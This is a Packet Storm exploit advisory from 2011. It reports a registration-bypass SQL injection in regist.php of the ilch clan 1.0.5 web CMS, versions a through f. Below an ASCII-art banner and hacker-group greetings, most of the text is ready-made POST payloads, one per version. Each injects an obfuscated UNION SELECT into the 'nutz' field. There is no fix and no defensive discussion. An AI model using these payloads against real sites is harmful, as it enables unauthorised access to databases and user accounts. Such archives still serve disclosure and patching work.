ilchClan 1.0.5 SQL Injection

2011-04-02T00:00:00
ID PACKETSTORM:100011
Type packetstorm
Reporter Easy Laster
Modified 2011-04-02T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-   
/ _____ _ _ \  
\ \_ \ | ___| |__ /  
/ / /\/ |/ __| '_ \ \  
\ /\/ /_ | | (__| | | | /  
/ \____/ |_|\___|_| |_| \  
\ Security Flaw in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php /  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-   
by  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
/ \  
\ ___ ___ ___ ___ _ _ _____ _ _ /  
/| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ \  
\|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| /  
/ |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| \  
\ |___| |___| /  
/ \  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
SQL Injection Vulnerability in ilch clan 1.0.5 a,b,c,d,e,f!  
Vulnerability Name : Registration Bypass SQL Injection Vulnerability  
Date : 02.04.2011  
SQL Injection method : $_POST   
Discovered by : Easy Laster  
Security Group :Team-Internet,Undergroundagents,websec-empire.to and 4004-Security-Project.com  
Greetings to free-hack.com  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
Security Flaws  
=-=-=-=-=-=-=-=-=-=-=-=  
ilch clan 1.0.5  
checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa  
ilch clan 1.0.5a  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa  
ilch clan 1.0.5b  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaa  
ilch clan 1.0.5c  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaa  
ilch clan 1.0.5d  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaaa  
ilch clan 1.0.5e  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa  
ilch clan 1.0.5f  
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa  
  
`